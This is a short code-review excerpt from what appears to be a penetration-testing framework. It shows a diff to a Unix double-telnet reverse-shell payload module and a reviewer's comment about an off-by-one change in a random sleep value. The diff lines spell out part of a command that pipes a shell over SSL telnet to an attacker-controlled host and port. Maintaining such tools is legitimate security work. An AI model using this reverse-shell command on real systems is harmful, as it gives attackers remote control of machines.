modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb

```diff
@@ -53,10 +53,10 @@ def generate(_opts = {})
   #
   def command_string
     cmd =
-      "#{datastore['ShellPath']} -c '(sleep #{3600+rand(1024)}|" +
-      "#{datastore['TelnetPath']} -z #{datastore['LHOST']} #{datastore['LPORT']}|" +
-      "while : ; do #{datastore['ShellPath']} && break; done 2>&1|" +
-      "#{datastore['TelnetPath']} -z #{datastore['LHOST']} #{datastore['LPORT']}" +
+      "#{datastore['ShellPath']} -c '(sleep #{rand(3600..4623)}|" \
```

Comment:
nab: This pattern's in a few places - `rand(1024)` seems more readable; but the off by one error is more clear here 😄